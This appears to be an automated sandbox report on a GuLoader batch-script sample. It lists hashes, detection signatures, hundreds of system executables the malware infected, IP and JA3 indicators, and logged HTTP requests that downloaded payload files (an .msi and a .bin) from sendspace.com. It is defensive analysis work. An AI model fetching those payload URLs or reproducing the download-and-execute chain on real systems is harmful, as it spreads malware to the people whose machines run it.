Windows Analysis Report
kam.cmd

Overview

General Information

Sample name: kam.cmd
Analysis ID: 1446787
MD5: c32ba3b07c8f7fec2d3b665e6c7b721e
SHA1: b4b05b772cfa9350934afffc9dcd9dc97593978e
SHA256: 320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9
Tags: cmd
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:50720 version: TLS 1.2
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2263492849.0000000006FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.28.80 104.21.28.80
Source: Joe Sandbox View IP Address: 69.31.136.57 69.31.136.57
Source: Joe Sandbox View IP Address: 69.31.136.53 69.31.136.53
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pro/dl/uq21t8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/6v0noo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n2.sendspace.comConnection: Keep-AliveCookie: SID=closeui34vo0u559s82bhev1m1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pro/dl/uq21t8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/6v0noo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n2.sendspace.comConnection: Keep-AliveCookie: SID=closeui34vo0u559s82bhev1m1
Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs12n5.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs13n2.sendspace.com
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1DDF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs12n5.sendspace.com
Source: wab.exe, 0000000A.00000002.2759736787.00000000239A0000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2256558573.00000000046F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
